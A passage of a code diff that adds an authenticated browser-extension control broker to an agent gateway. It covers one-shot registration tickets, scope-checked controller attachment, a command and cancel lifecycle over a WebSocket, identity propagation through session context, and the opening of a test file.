ControllerScope + expires_at: float + consumed: bool = False + + +@dataclass +class _Controller: + scope: ControllerScope + send: Callable[[dict], None] + owner: Any = None + # Serialize command/cancel writes with detach or replacement. Broker state + # is never held while waiting for this lock, so a transport callback may + # synchronously call complete() without deadlocking the broker. + send_lock: threading.Lock = field(default_factory=threading.Lock) + + +@dataclass +class _PendingCommand: + scope: ControllerScope + command_id: str + tool_call_id: Optional[str] + event: threading.Event = field(default_factory=threading.Event) + done: bool = False + cancelled: bool = False + ok: bool = False + result: Any = None + + +class BrowserControlBroker: + """Thread-safe broker core binding controllers to callers. + + Parameters + ---------- + ticket_ttl: + Lifetime of minted tickets in clock seconds. + command_timeout: + Seconds a ``dispatch`` waits for completion before raising + :class:`ControllerTimeout`. + clock: + Injectable time source (defaults to ``time.monotonic``); tests pin it + to make expiry deterministic. + """ + + def __init__( + self, + *, + ticket_ttl: float = DEFAULT_TICKET_TTL, + command_timeout: float = DEFAULT_COMMAND_TIMEOUT, + clock: Optional[Callable[[], float]] = None, + ) -> None: + self._ticket_ttl = ticket_ttl + self._command_timeout = command_timeout + self._clock = clock if clock is not None else time.monotonic + self._lock = threading.RLock() + self._tickets: Dict[str, _TicketRecord] = {} + self._controllers: Dict[ControllerScope, _Controller] = {} + self._pending: Dict[str, _PendingCommand] = {} + + # ------------------------------------------------------------------ + # Registration tickets + # ------------------------------------------------------------------ + + def mint_ticket(self, scope: ControllerScope) -> Ticket: + """Mint a short-lived, single-use ticket bound to ``scope``.""" + now = self._clock() + with self._lock: + self._prune_tickets(now) + value = secrets.token_urlsafe(32) + record = _TicketRecord(scope=scope, expires_at=now + self._ticket_ttl) + self._tickets[value] = record + return Ticket(value=value, expires_at=record.expires_at) + + def consume_ticket(self, value: str) -> ControllerScope: + """Exchange a ticket for its scope, exactly once. + + Raises :class:`TicketInvalid` for unknown, already-consumed, or + expired tickets. The expiry check happens against the live clock at + consume time, so a ticket that outlived its TTL can never be used. + """ + now = self._clock() + with self._lock: + record = self._tickets.get(value) + if record is None: + raise TicketInvalid("unknown ticket") + if record.consumed: + raise TicketInvalid("ticket already consumed") + if now > record.expires_at: + raise TicketInvalid("ticket expired") + record.consumed = True + return record.scope + + def _prune_tickets(self, now: float) -> None: + """Drop expired tickets (caller must hold the lock).""" + expired = [value for value, rec in self._tickets.items() if rec.expires_at <= now] + for value in expired: + del self._tickets[value] + + # ------------------------------------------------------------------ + # Controller registration / selection + # ------------------------------------------------------------------ + + def attach( + self, + scope: ControllerScope, + send: Callable[[dict], None], + *, + owner: Any = None, + ) -> None: + """Register the controller owning ``scope`` with frame callback ``send``. + + Re-attaching an already-attached scope replaces the prior controller + (logged); a controller that wants to go away must call ``detach``. + """ + replacement = _Controller(scope=scope, send=send, owner=owner) + with self._lock: + existing = self._controllers.get(scope) + if existing is None: + with self._lock: + # A concurrent attach may have won after the optimistic read; + # retry through the replacement path rather than overwriting it. + existing = self._controllers.get(scope) + if existing is None: + self._controllers[scope] = replacement + return + + assert existing is not None + logger.warning( + "browser controller re-attached for scope %r; replacing prior controller", + scope, + ) + with existing.send_lock: + with self._lock: + if self._controllers.get(scope) is not existing: + # Another replacement won while this caller waited. Re-run + # against the new generation so its pending work is not + # orphaned by an unconditional overwrite. + retry = True + pendings = [] + else: + retry = False + pendings = self._pending_for_scope_locked(scope) + for pending in pendings: + self._resolve_pending(pending, cancelled=True) + self._controllers[scope] = replacement + if not retry: + self._emit_cancel_frames(existing, pendings) + return + self.attach(scope, send, owner=owner) + + def select(self, scope: ControllerScope, capability: str) -> Optional[_Controller]: + """Return the controller exactly matching ``scope`` and ``capability``. + + ``None`` when any identity field differs or the capability is not in + the controller's capability set. The controller's own scope is the + authority on capabilities. + """ + with self._lock: + controller = self._controllers.get(scope) + if controller is None: + return None + if capability not in controller.scope.capabilities: + return None + return controller + + def detach( + self, + scope: ControllerScope, + *, + owner: Any = _OWNER_UNSET, + notify_controller: bool = True, + ) -> None: + """Remove the controller for ``scope`` and fail its pending work closed. + + Every pending command of the scope is marked cancelled and resolved, + so waiting dispatchers raise :class:`ControllerCancelled`; a late + ``complete`` for any of them returns ``False`` (the command id is no + longer pending). + """ + with self._lock: + controller = self._controllers.get(scope) + if controller is None: + return + if owner is not _OWNER_UNSET and controller.owner != owner: + return + with controller.send_lock: + with self._lock: + if self._controllers.get(scope) is not controller: + return + if owner is not _OWNER_UNSET and controller.owner != owner: + return + self._controllers.pop(scope, None) + pendings = self._pending_for_scope_locked(scope) + for pending in pendings: + self._resolve_pending(pending, cancelled=True) + # Keep the old generation's send lock through cancellation so a + # command frame can never overtake its terminal cancel frame. + if notify_controller: + self._emit_cancel_frames(controller, pendings) + + # ------------------------------------------------------------------ + # Command lifecycle + # ------------------------------------------------------------------ + + def dispatch( + self, + scope: ControllerScope, + *, + action: str, + arguments: Optional[dict] = None, + tool_call_id: Optional[str] = None, + ) -> Any: + """Send one controller command and block for its completion. + + Emits a ``browser.controller.command`` frame carrying a fresh command + id, then waits up to ``command_timeout`` seconds. Returns the + controller's completion result, or raises: + + - :class:`ControllerUnavailable` — no exact scope/capability match; + - :class:`ControllerCancelled` — cancelled via ``cancel``/``detach``; + - :class:`ControllerTimeout` — no completion within the timeout; + - :class:`ControllerRejected` — completed with ``ok=False``. + + Exactly one pending command exists per command id; ``complete`` is + single-shot, so a command can never resolve twice. + """ + controller = self.select(scope, action) + if controller is None: + raise ControllerUnavailable( + f"no controller for scope {scope!r} with capability {action!r}" + ) + + command_id = secrets.token_hex(16) + frame = { + "method": FRAME_COMMAND, + "params": { + "command_id": command_id, + "action": action, + "arguments": dict(arguments or {}), + "controller_id": scope.controller_id, + "browser_profile_id": scope.browser_profile_id, + "tool_call_id": tool_call_id, + }, + } + pending = _PendingCommand( + scope=scope, + command_id=command_id, + tool_call_id=tool_call_id, + ) + with controller.send_lock: + with self._lock: + # select() intentionally runs outside the send lock. Revalidate + # the exact controller generation after acquiring it so detach + # or replacement cannot leave a stale command waiting forever. + if self._controllers.get(scope) is not controller: + raise ControllerUnavailable( + f"controller for scope {scope!r} detached before dispatch" + ) + self._pending[command_id] = pending + + try: + controller.send(frame) + except Exception: + # The command never left the building; unreserve the id and + # surface the transport failure to the caller. + with self._lock: + self._pending.pop(command_id, None) + raise + + if not pending.event.wait(timeout=self._command_timeout): + timed_out = False + with self._lock: + # Event.wait() may return False at the exact boundary where a + # completion already won and removed the pending command. + if not pending.done and self._pending.get(command_id) is pending: + pending.done = True + del self._pending[command_id] + timed_out = True + if timed_out: + with controller.send_lock: + with self._lock: + still_attached = self._controllers.get(scope) is controller + if still_attached: + self._emit_cancel_frames(controller, [pending]) + raise ControllerTimeout( + f"controller did not complete command {command_id!r} " + f"within {self._command_timeout}s" + ) + + if pending.cancelled: + raise ControllerCancelled(f"command {command_id!r} was cancelled") + if not pending.ok: + raise ControllerRejected( + f"controller rejected command {command_id!r}: {pending.result!r}" + ) + return pending.result + + def complete( + self, + command_id: str, + *, + scope: Optional[ControllerScope] = None, + ok: bool, + result: Any = None, + ) -> bool: + """Resolve a pending command by id; ``False`` when none is pending. + + Safe to call from inside the controller's own ``send`` callback (the + broker never holds its lock across a send). Late completions — after + ``cancel`` or ``detach`` already resolved the command — are ignored + and report ``False``. + """ + with self._lock: + pending = self._pending.get(command_id) + if pending is None or pending.done: + return False + if scope is not None and pending.scope != scope: + return False + pending.done = True + pending.ok = ok is True + pending.result = result + del self._pending[command_id] + pending.event.set() + return True + + def cancel(self, scope: ControllerScope, *, tool_call_id: Optional[str]) -> bool: + """Cancel exactly the pending command matching ``scope`` + tool_call_id. + + Emits one ``browser.controller.cancel`` frame naming the cancelled + command's id. Returns ``True`` when a command was cancelled and + ``False`` when nothing matched (so transports can answer idempotently + without inventing state). + """ + with self._lock: + controller = self._controllers.get(scope) + if controller is None: + return False + with controller.send_lock: + with self._lock: + if self._controllers.get(scope) is not controller: + return False + target = None + for pending in self._pending.values(): + if ( + pending.scope == scope + and pending.tool_call_id == tool_call_id + and not pending.done + ): + target = pending + break + if target is None: + return False + self._resolve_pending(target, cancelled=True) + self._emit_cancel_frames(controller, [target]) + return True + + # ------------------------------------------------------------------ + # Internals (all callers must hold the lock) + # ------------------------------------------------------------------ + + def _resolve_pending(self, pending: _PendingCommand, *, cancelled: bool) -> None: + """Mark ``pending`` resolved and drop it from the registry.""" + pending.cancelled = cancelled + pending.done = True + del self._pending[pending.command_id] + pending.event.set() + + def _pending_for_scope_locked(self, scope: ControllerScope) -> list[_PendingCommand]: + return [ + pending + for pending in list(self._pending.values()) + if pending.scope == scope + ] + + def _emit_cancel_frames( + self, controller: _Controller, pendings: list[_PendingCommand] + ) -> None: + for pending in pendings: + frame = { + "method": FRAME_CANCEL, + "params": { + "command_id": pending.command_id, + "tool_call_id": pending.tool_call_id, + }, + } + try: + controller.send(frame) + except Exception: + logger.exception( + "failed to emit cancel frame for command %r", pending.command_id + ) + + def scope_for_session( + self, + *, + session_id: Optional[str] = None, + task_id: Optional[str] = None, + principal_id: Optional[str] = None, + transport_family: Optional[str] = None, + ) -> Optional[ControllerScope]: + """Return one unambiguous attached scope for a server-owned session. + + A public session id is only a lookup hint. The caller must also supply + its server-derived principal and transport family; missing identity, + no match, or multiple matches fail closed rather than selecting by + insertion order. + """ + target = str(session_id or task_id or "").strip() + principal = str(principal_id or "").strip() + family = str(transport_family or "").strip() + if not target or not principal or not family: + return None + with self._lock: + matches = [ + scope + for scope in self._controllers + if scope.session_id == target + and scope.principal_id == principal + and scope.transport_family == family + ] + return matches[0] if len(matches) == 1 else None + + def detach_owner(self, owner: Any, *, notify_controller: bool = True) -> int: + """Detach every controller owned by one transport connection.""" + with self._lock: + scopes = [ + scope + for scope, controller in self._controllers.items() + if controller.owner == owner + ] + for scope in scopes: + self.detach( + scope, + owner=owner, + notify_controller=notify_controller, + ) + return len(scopes) + + def reset(self) -> None: + """Fail all live work closed and clear tickets (tests/shutdown).""" + with self._lock: + scopes = list(self._controllers) + for scope in scopes: + self.detach(scope) + with self._lock: + self._tickets.clear() + # Defensive cleanup for any pending entry whose controller was + # concurrently removed by a transport teardown. + for pending in list(self._pending.values()): + self._resolve_pending(pending, cancelled=True) + + @property + def ticket_ttl_seconds(self) -> float: + """Configured lifetime for newly minted one-shot tickets.""" + return self._ticket_ttl + + @property + def pending_count(self) -> int: + """Number of commands awaiting completion (diagnostics/tests).""" + with self._lock: + return len(self._pending) + + +_GLOBAL_BROKER = BrowserControlBroker() + + +def get_browser_control_broker() -> BrowserControlBroker: + """Process-local broker shared by API and dashboard Gateway transports.""" + return _GLOBAL_BROKER + + +def browser_control_enabled(config: Optional[dict] = None) -> bool: + """Return the explicit Phase 4 feature flag (disabled by default).""" + if config is None: + try: + from hermes_cli.config import load_config + + config = load_config() + except Exception: + return False + if not isinstance(config, dict): + return False + browser = config.get("browser") + if not isinstance(browser, dict): + return False + extension_control = browser.get("extension_control") + if not isinstance(extension_control, dict): + return False + return extension_control.get("enabled", False) is True diff --git a/gateway/platforms/api_server.py b/gateway/platforms/api_server.py index 53e9ad7a70..33efd02172 100644 --- a/gateway/platforms/api_server.py +++ b/gateway/platforms/api_server.py @@ -70,6 +70,22 @@ _PROFILE_REJECTED = object() _api_request_profile: ContextVar[Optional[str]] = ContextVar( "api_server_request_profile", default=None ) +_api_request_browser_control_principal: ContextVar[str] = ContextVar( + "api_server_browser_control_principal", default="" +) +_api_request_browser_control_transport_family: ContextVar[str] = ContextVar( + "api_server_browser_control_transport_family", default="" +) + +#: Phase 4 browser-extension control protocol version (advertised in +#: /v1/capabilities and echoed in registration responses). +_BROWSER_CONTROL_PROTOCOL_VERSION = 1 +#: Capabilities this phase actually grants a controller. Only the no-op +#: probe is real until the action protocol ships; any requested capability +#: outside this set is filtered out rather than advertised. +_BROWSER_CONTROL_CAPABILITIES = frozenset({"controller.noop"}) +_BROWSER_CONTROL_WS_PROTOCOL = "hermes-browser-control-v1" +_BROWSER_CONTROL_TICKET_PROTOCOL_PREFIX = "hermes-browser-control-ticket." def _approval_event_choices(*, smart_denied: bool, allow_permanent: bool) -> list[str]: if smart_denied: @@ -95,6 +111,11 @@ from gateway.platforms.base import ( from agent.redact import redact_sensitive_text from agent.interrupt_compat import request_hard_interrupt from gateway.readiness import collect_runtime_readiness +from gateway.browser_control_broker import ( + ControllerScope, + TicketInvalid, + get_browser_control_broker, +) from agent.secret_scope import UnscopedSecretError as _UnscopedSecretError from agent.secret_scope import get_secret as _scoped_get_secret @@ -1494,6 +1515,11 @@ class APIServerAdapter(BasePlatformAdapter): # Shutdown counts this reservation so the request cannot slip through # the drain between its first await and _run_agent()/task registration. self._pending_agent_requests: int = 0 + # Phase 4 browser-control broker core: transport-neutral ticket / + # controller / command lifecycle shared with the dashboard Gateway + # transport. This adapter only maps HTTP registration and the + # controller WebSocket onto the broker; it owns no broker state. + self._browser_control_broker = get_browser_control_broker() def active_agent_work_count(self) -> int: """Return all live agent work owned by this API adapter. @@ -2063,7 +2089,18 @@ class APIServerAdapter(BasePlatformAdapter): token = _api_request_profile.set(profile) try: with self._profile_scope(profile): - return await handler(request) + resolved_profile = profile or "default" + principal_token = _api_request_browser_control_principal.set( + self._derive_browser_control_principal(resolved_profile) + ) + family_token = _api_request_browser_control_transport_family.set( + self._browser_control_transport_family(request) + ) + try: + return await handler(request) + finally: + _api_request_browser_control_transport_family.reset(family_token) + _api_request_browser_control_principal.reset(principal_token) finally: _api_request_profile.reset(token) @@ -2082,6 +2119,12 @@ class APIServerAdapter(BasePlatformAdapter): ("GET", "/v1/models", self._handle_models), ("GET", "/api/model/options", self._handle_model_options), ("GET", "/v1/capabilities", self._handle_capabilities), + # Phase 4 authenticated browser-control surface: POST registration + # mints a short-lived ticket; the controller then opens the WS with + # that ticket. Both are gated on browser.extension_control.enabled + # and API-key auth (see the handlers for the exact status ladder). + ("POST", "/v1/browser-control/register", self._handle_browser_control_register), + ("GET", "/v1/browser-control/ws", self._handle_browser_control_ws), ("GET", "/v1/skills", self._handle_skills), ("GET", "/v1/toolsets", self._handle_toolsets), ("GET", "/api/sessions", self._handle_list_sessions), @@ -3213,6 +3256,21 @@ class APIServerAdapter(BasePlatformAdapter): "session_continuity_header": "X-Hermes-Session-Id", "session_key_header": "X-Hermes-Session-Key", "cors": bool(self._cors_origins), + # Phase 4 browser-extension control. Always advertised (so + # clients can feature-detect), but truthful: disabled until + # browser.extension_control.enabled is set, and Phase 4 + # exposes no real browser actions — only the no-op controller + # capability is ever granted. + "browser_extension_control": { + "enabled": self._browser_control_enabled(), + "protocol_version": _BROWSER_CONTROL_PROTOCOL_VERSION, + "capabilities": list(_BROWSER_CONTROL_CAPABILITIES), + "real_browser_actions": False, + "transports": { + "local_vps": "websocket-subprotocol-ticket", + "cloud": "authenticated-gateway-rpc", + }, + }, }, "endpoints": { "health": {"method": "GET", "path": "/health"}, @@ -3239,9 +3297,307 @@ class APIServerAdapter(BasePlatformAdapter): "session_chat": {"method": "POST", "path": "/api/sessions/{session_id}/chat"}, "session_chat_stream": {"method": "POST", "path": "/api/sessions/{session_id}/chat/stream"}, "session_model_lock": {"method": "POST", "path": "/api/sessions/{session_id}/model"}, + "browser_control_register": {"method": "POST", "path": "/v1/browser-control/register"}, + "browser_control_ws": {"method": "GET", "path": "/v1/browser-control/ws"}, }, }) + # ------------------------------------------------------------------ + # Phase 4 browser-extension control (authenticated local/VPS API) + # ------------------------------------------------------------------ + + async def _handle_browser_control_register(self, request: "web.Request") -> "web.Response": + """POST /v1/browser-control/register — mint a controller ticket. + + The extension controller proves itself with the same Bearer API key + every other API-server client uses, then receives a short-lived, + single-use ticket to open the controller WebSocket. Identity is NOT + taken from the request body: the scope principal is derived + server-side from the authenticated key/profile as a non-reversible + digest, and the capability set is filtered to what this phase + actually grants (``controller.noop``), so a spoofed + ``principal_id`` or inflated capability list in the payload is + ignored rather than honored. The named session must already exist in + the active profile's server-owned SessionDB before a ticket is minted. + + Status ladder: 404 when the feature is disabled, 403 when no API key + is configured at all (registration can never be authenticated), 401 + for a missing/invalid Bearer token, 201 on success. + """ + if not self._browser_control_enabled(): + return web.json_response( + _openai_error( + "Browser control is not enabled on this server.", + code="browser_control_disabled", + ), + status=404, + ) + if not self._api_key: + logger.warning( + "browser-control registration rejected: no API key configured; " + "set API_SERVER_KEY to enable authenticated browser control." + ) + return web.json_response( + _openai_error( + "Browser control registration requires a configured API key.", + err_type="gateway_auth_error", + code="browser_control_auth_required", + ), + status=403, + ) + auth_err = self._check_auth(request) + if auth_err: + return auth_err + + try: + payload = await request.json() + except Exception: + return web.json_response( + _openai_error("Request body must be valid JSON."), status=400 + ) + if not isinstance(payload, dict): + return web.json_response( + _openai_error("Request body must be a JSON object."), status=400 + ) + + controller_id = str(payload.get("controller_id") or "").strip() + browser_profile_id = str(payload.get("browser_profile_id") or "").strip() + session_id = str(payload.get("session_id") or "").strip() + if not controller_id or not browser_profile_id or not session_id: + return web.json_response( + _openai_error( + "controller_id, browser_profile_id, and session_id are required.", + code="browser_control_invalid_registration", + ), + status=400, + ) + + db = await self._ensure_session_db_async() + if db is None: + return web.json_response( + _openai_error( + "Session database unavailable.", + code="session_db_unavailable", + ), + status=503, + ) + session = await asyncio.to_thread(db.get_session, session_id) + if not session: + return web.json_response( + _openai_error( + "Browser control may register only for an existing server session.", + err_type="gateway_auth_error", + code="browser_control_session_forbidden", + ), + status=403, + ) + + profile = _api_request_profile.get() or "default" + capabilities = frozenset( + capability + for capability in payload.get("capabilities") or [] + if isinstance(capability, str) + and capability in _BROWSER_CONTROL_CAPABILITIES + ) + scope = ControllerScope( + principal_id=self._derive_browser_control_principal(profile), + profile_id=profile, + session_id=session_id or None, + controller_id=controller_id, + browser_profile_id=browser_profile_id, + transport_family=self._browser_control_transport_family(request), + capabilities=capabilities, + ) + ticket = self._browser_control_broker.mint_ticket(scope) + ticket_ttl = self._browser_control_broker.ticket_ttl_seconds + return web.json_response( + { + "protocol_version": _BROWSER_CONTROL_PROTOCOL_VERSION, + "ticket": ticket.value, + "ticket_expires_at": time.time() + ticket_ttl, + "ticket_expires_in_seconds": ticket_ttl, + "ws_path": "/v1/browser-control/ws", + "scope": { + "principal_id": scope.principal_id, + "profile_id": scope.profile_id, + "session_id": scope.session_id, + "controller_id": scope.controller_id, + "browser_profile_id": scope.browser_profile_id, + "transport_family": scope.transport_family, + "capabilities": sorted(scope.capabilities), + }, + }, + status=201, + ) + + async def _handle_browser_control_ws(self, request: "web.Request") -> "web.WebSocketResponse": + """GET /v1/browser-control/ws — controller WebSocket (one-shot ticket). + + A ticket-bearing ``Sec-WebSocket-Protocol`` token is exchanged exactly + once for the identity scope minted at registration; query-string, + unknown, already-consumed, or expired tickets are rejected with 401 + before upgrade. The socket then attaches to the shared broker under + that scope, forwards broker command/cancel frames onto the aiohttp loop + thread-safely, and accepts controller result/cancel frames. Completion + is exact-scope checked, and owner-aware teardown cannot detach a newer + replacement controller generation. + """ + # Re-check at upgrade time so disabling the feature immediately closes + # the admission gate without consuming still-live one-shot tickets. + if not self._browser_control_enabled(): + raise web.HTTPNotFound() + + # Credentials in the request target are liable to appear in access + # logs. Accept the one-shot ticket only as a WebSocket subprotocol; + # reject the former query-string shape without consuming it. + if request.query.get("ticket"): + raise web.HTTPUnauthorized() + requested_protocols = [ + value.strip() + for value in request.headers.get("Sec-WebSocket-Protocol", "").split(",") + if value.strip() + ] + ticket_protocols = [ + value + for value in requested_protocols + if value.startswith(_BROWSER_CONTROL_TICKET_PROTOCOL_PREFIX) + ] + if ( + _BROWSER_CONTROL_WS_PROTOCOL not in requested_protocols + or len(ticket_protocols) != 1 + ): + raise web.HTTPUnauthorized() + ticket_value = ticket_protocols[0][len(_BROWSER_CONTROL_TICKET_PROTOCOL_PREFIX) :] + if not ticket_value: + raise web.HTTPUnauthorized() + try: + scope = self._browser_control_broker.consume_ticket(ticket_value) + except TicketInvalid: + raise web.HTTPUnauthorized() from None + except Exception: + logger.exception("browser-control WS ticket consumption failed") + raise web.HTTPUnauthorized() from None + + ws = web.WebSocketResponse( + heartbeat=30.0, + protocols=(_BROWSER_CONTROL_WS_PROTOCOL,), + ) + await ws.prepare(request) + loop = asyncio.get_running_loop() + + def _send(frame: dict) -> None: + """Broker send callback: forward a frame onto the aiohttp loop. + + Called from broker dispatch threads; aiohttp socket writes must + happen on the event loop. Waiting for the write here preserves + command ordering and lets a closed socket fail the dispatch + instead of silently dropping the frame. + """ + if ws.closed: + raise ConnectionError("browser-control websocket is closed") + try: + on_loop = asyncio.get_running_loop() is loop + except RuntimeError: + on_loop = False + if on_loop: + loop.create_task(ws.send_json(frame)) + return + future = asyncio.run_coroutine_threadsafe(ws.send_json(frame), loop) + future.result(timeout=10.0) + + self._browser_control_broker.attach(scope, _send, owner=ws) + try: + async for msg in ws: + if msg.type == web.WSMsgType.TEXT: + try: + frame = msg.json() + except Exception: + continue + if isinstance(frame, dict): + self._handle_browser_control_frame(scope, frame) + elif msg.type in (web.WSMsgType.CLOSE, web.WSMsgType.ERROR): + break + finally: + self._browser_control_broker.detach( + scope, + owner=ws, + notify_controller=False, + ) + return ws + + def _handle_browser_control_frame(self, scope: "ControllerScope", frame: dict) -> None: + """Apply one controller→broker frame with exact-scope checks.""" + method = frame.get("method") + params = frame.get("params") + if not isinstance(params, dict): + return + if method == "browser.controller.result": + command_id = params.get("command_id") + if isinstance(command_id, str) and command_id: + # Broker resolves only the pending command whose scope equals + # this socket's scope; a stranger's command id is a no-op. + ok = params.get("ok") is True + self._browser_control_broker.complete( + command_id, + scope=scope, + ok=ok, + result=params.get("result") if ok else params.get("error"), + ) + elif method == "browser.controller.cancel": + tool_call_id = params.get("tool_call_id") + if isinstance(tool_call_id, str) and tool_call_id: + self._browser_control_broker.cancel(scope, tool_call_id=tool_call_id) + + def _browser_control_enabled(self) -> bool: + """Phase 4 feature flag; False unless explicitly enabled. + + Reads ``browser.extension_control.enabled`` from the global config + (defaults to False). Tests monkeypatch this method directly to force + the feature on/off without touching config. + """ + try: + from gateway.browser_control_broker import browser_control_enabled as _flag + + return _flag() + except Exception: + return False + + def _derive_browser_control_principal(self, profile: str) -> str: + """Server-derived controller principal (non-reversible digest). + + The principal is bound to the credential that authenticated the + registration request — the expected API key for the request's + profile — so a client cannot impersonate another controller by + echoing an id in the registration body. + """ + key = self._expected_api_key() or self._api_key or "" + digest = hashlib.sha256(f"{profile}\x00{key}".encode("utf-8")).hexdigest() + return f"principal:{profile}:{digest[:32]}" + + def _browser_control_transport_family(self, request: "web.Request") -> str: + """Local vs remote API family, decided by the loopback peer. + + A controller speaking to a localhost listener is in the same trust + domain as the host and gets the ``local-api`` family; anything else + is ``remote-api``. The broker treats the family as part of exact + identity, so a remote controller can never satisfy a local-only + dispatch (and vice versa). + """ + host = None + try: + transport = request.transport + if transport is not None: + peer = transport.get_extra_info("peername") + if isinstance(peer, tuple) and peer: + host = peer[0] + elif isinstance(peer, str): + host = peer + except Exception: + host = None + if host in ("127.0.0.1", "::1", "localhost"): + return "local-api" + return "remote-api" + async def _handle_skills(self, request: "web.Request") -> "web.Response": """GET /v1/skills — list installed skills visible to the API-server agent. @@ -6308,6 +6664,8 @@ class APIServerAdapter(BasePlatformAdapter): chat_id: str = "", session_key: str = "", session_id: str = "", + browser_control_principal: str = "", + browser_control_transport_family: str = "", ) -> list: """Bind session contextvars for an API-server agent run. @@ -6331,6 +6689,8 @@ class APIServerAdapter(BasePlatformAdapter): chat_id=chat_id, session_key=session_key, session_id=session_id, + browser_control_principal=browser_control_principal, + browser_control_transport_family=browser_control_transport_family, async_delivery=False, cron_session="", ) @@ -6391,6 +6751,12 @@ class APIServerAdapter(BasePlatformAdapter): # run_in_executor threads, so the profile scope must be re-entered # inside _run() from this explicit value. request_profile = _api_request_profile.get() + request_browser_control_principal = ( + _api_request_browser_control_principal.get() + ) + request_browser_control_transport_family = ( + _api_request_browser_control_transport_family.get() + ) def _run(): from gateway.session_context import clear_session_vars @@ -6400,6 +6766,10 @@ class APIServerAdapter(BasePlatformAdapter): chat_id=session_id or "", session_key=gateway_session_key or session_id or "", session_id=session_id or "", + browser_control_principal=request_browser_control_principal, + browser_control_transport_family=( + request_browser_control_transport_family + ), ) agent = None try: @@ -6833,6 +7203,12 @@ class APIServerAdapter(BasePlatformAdapter): # Background task outlives the HTTP response (and thus the middleware # profile scope). Capture now and re-enter inside the task/executor. request_profile = _api_request_profile.get() + request_browser_control_principal = ( + _api_request_browser_control_principal.get() + ) + request_browser_control_transport_family = ( + _api_request_browser_control_transport_family.get() + ) async def _run_and_close(): try: @@ -6922,6 +7298,12 @@ class APIServerAdapter(BasePlatformAdapter): chat_id=session_id or "", session_key=approval_session_key, session_id=session_id or "", + browser_control_principal=( + request_browser_control_principal + ), + browser_control_transport_family=( + request_browser_control_transport_family + ), ) register_gateway_notify(approval_session_key, _approval_notify) # /v1/runs runs its own agent lifecycle (no diff --git a/gateway/session_context.py b/gateway/session_context.py index 7a2c53ab3a..9a6a8c4226 100644 --- a/gateway/session_context.py +++ b/gateway/session_context.py @@ -102,6 +102,12 @@ _SESSION_UI_SESSION_ID: ContextVar = ContextVar("HERMES_UI_SESSION_ID", default= _SESSION_MESSAGE_ID: ContextVar = ContextVar("HERMES_SESSION_MESSAGE_ID", default=_UNSET) _SESSION_PROFILE: ContextVar = ContextVar("HERMES_SESSION_PROFILE", default=_UNSET) +_BROWSER_CONTROL_PRINCIPAL: ContextVar = ContextVar( + "HERMES_BROWSER_CONTROL_PRINCIPAL", default=_UNSET +) +_BROWSER_CONTROL_TRANSPORT_FAMILY: ContextVar = ContextVar( + "HERMES_BROWSER_CONTROL_TRANSPORT_FAMILY", default=_UNSET +) # Per-session cron marker. Unlike the process-global legacy env var, this is # scoped to one cron job / inbound session. _UNSET preserves the legacy env @@ -151,6 +157,8 @@ _VAR_MAP = { "HERMES_UI_SESSION_ID": _SESSION_UI_SESSION_ID, "HERMES_SESSION_MESSAGE_ID": _SESSION_MESSAGE_ID, "HERMES_SESSION_PROFILE": _SESSION_PROFILE, + "HERMES_BROWSER_CONTROL_PRINCIPAL": _BROWSER_CONTROL_PRINCIPAL, + "HERMES_BROWSER_CONTROL_TRANSPORT_FAMILY": _BROWSER_CONTROL_TRANSPORT_FAMILY, "HERMES_CRON_SESSION": _CRON_SESSION, "HERMES_CRON_AUTO_DELIVER_PLATFORM": _CRON_AUTO_DELIVER_PLATFORM, "HERMES_CRON_AUTO_DELIVER_CHAT_ID": _CRON_AUTO_DELIVER_CHAT_ID, @@ -228,6 +236,8 @@ def set_session_vars( session_id: str = "", message_id: str = "", profile: str = "", + browser_control_principal: str = "", + browser_control_transport_family: str = "", cwd: str = "", async_delivery: bool = True, ui_session_id: str = "", @@ -273,6 +283,8 @@ def set_session_vars( _SESSION_UI_SESSION_ID.set(ui_session_id), _SESSION_MESSAGE_ID.set(message_id), _SESSION_PROFILE.set(profile), + _BROWSER_CONTROL_PRINCIPAL.set(browser_control_principal), + _BROWSER_CONTROL_TRANSPORT_FAMILY.set(browser_control_transport_family), _CRON_SESSION.set(cron_session), _SESSION_ASYNC_DELIVERY.set(bool(async_delivery)), ] @@ -312,6 +324,8 @@ def clear_session_vars(tokens: list) -> None: _SESSION_UI_SESSION_ID, _SESSION_MESSAGE_ID, _SESSION_PROFILE, + _BROWSER_CONTROL_PRINCIPAL, + _BROWSER_CONTROL_TRANSPORT_FAMILY, _CRON_SESSION, ): var.set("") diff --git a/hermes_cli/web_server.py b/hermes_cli/web_server.py index cc24499880..22dd7b56a1 100644 --- a/hermes_cli/web_server.py +++ b/hermes_cli/web_server.py @@ -16010,7 +16010,16 @@ def _ws_auth_reason(ws: "WebSocket") -> tuple[Optional[str], str]: internal = ws.query_params.get("internal", "") if internal: try: - consume_internal_credential(internal) + info = consume_internal_credential(internal) + # Stamp the server-minted identity onto the WS object so the + # connection (and any transport built from it) can never be + # impersonated by RPC params. Internal peers are marked + # ``server-internal`` and are excluded from privileged + # controller registration downstream. + ws._hermes_auth_identity = { + "user_id": info.get("user_id"), + "provider": info.get("provider"), + } return None, "internal" except TicketInvalid as exc: audit_log( @@ -16026,7 +16035,18 @@ def _ws_auth_reason(ws: "WebSocket") -> tuple[Optional[str], str]: return "no_credential", "none" try: - consume_ticket(ticket) + info = consume_ticket(ticket) + # The ticket binds a server-minted {user_id, provider}; stamp it + # onto the WS object so ``gateway_ws`` can hand it to the gateway + # transport, where it is the sole identity authority for + # browser-controller registration. A client can never supply or + # spoof this value through RPC params. Only the two identity + # fields are carried — bookkeeping (e.g. ``minted_at``) is not + # part of the identity contract. + ws._hermes_auth_identity = { + "user_id": info.get("user_id"), + "provider": info.get("provider"), + } return None, "ticket" except TicketInvalid as exc: audit_log( @@ -17147,7 +17167,11 @@ async def gateway_ws(ws: WebSocket) -> None: from tui_gateway.ws import handle_ws - await handle_ws(ws) + # The authenticated identity (ticket / internal credential) was stamped + # onto the WS object by _ws_auth_reason; carry it into the gateway + # transport where it becomes the identity authority for privileged RPCs + # (browser.controller.register). None on the legacy token path. + await handle_ws(ws, auth_identity=getattr(ws, "_hermes_auth_identity", None)) # --------------------------------------------------------------------------- diff --git a/tests/gateway/test_browser_control_api.py b/tests/gateway/test_browser_control_api.py new file mode 100644 index 0000000000..d47d98e845 --- /dev/null +++ b/tests/gateway/test_browser_control_api.py @@ -0,0 +1,390 @@ +import asyncio +import time + +import pytest +from aiohttp import WSServerHandshakeError, web +from aiohttp.test_utils import TestClient, TestServer + +from gateway.browser_control_broker import ControllerRejected, ControllerScope +from gateway.config import PlatformConfig +from gateway.platforms.api_server import APIServerAdapter + + +API_KEY = "-".join(("fixture", "neutral", "api", "key", "123")) +CONTROL_PROTOCOL 